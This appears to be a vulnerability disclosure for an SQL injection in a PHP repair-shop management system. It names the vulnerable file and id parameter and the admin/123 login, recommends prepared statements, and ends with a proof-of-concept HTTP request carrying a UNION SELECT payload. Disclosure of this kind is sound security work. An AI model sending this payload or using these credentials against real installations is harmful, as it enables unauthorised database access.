# Vulnerability Summary ## Overview - **Vulnerability Name**: Computer and Mobile Repair Shop Management System v1.0 SQL Injection - **Vulnerability Type**: SQL Injection - **Vulnerable File**: `/rsms/admin/repairs/view_details.php` - **Vulnerable Location**: `/rsms/admin/?page=repairs/view_details&id=` - **Database Name**: `rms_db` ## Impact Scope - **Affected System**: Computer and Mobile Repair Shop Management System v1.0 - **Exploitation Requirement**: Requires login credentials `admin/123` - **Exploitation Method**: Obtain database information by crafting malicious SQL statements ## Remediation Plan - **Remediation Recommendation**: Strictly filter and validate input parameters; use prepared statements to prevent SQL injection. ## POC Code ```http GET /rsms/admin/?page=repairs/view_details&id=-1%27%20union%20select%201,2,3,4,5,6,7,8,9,10-- - HTTP/1.1 Host: 192.168.1.10 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=4hcq3m6jyjsdu2ermtngnu37 Connection: close ```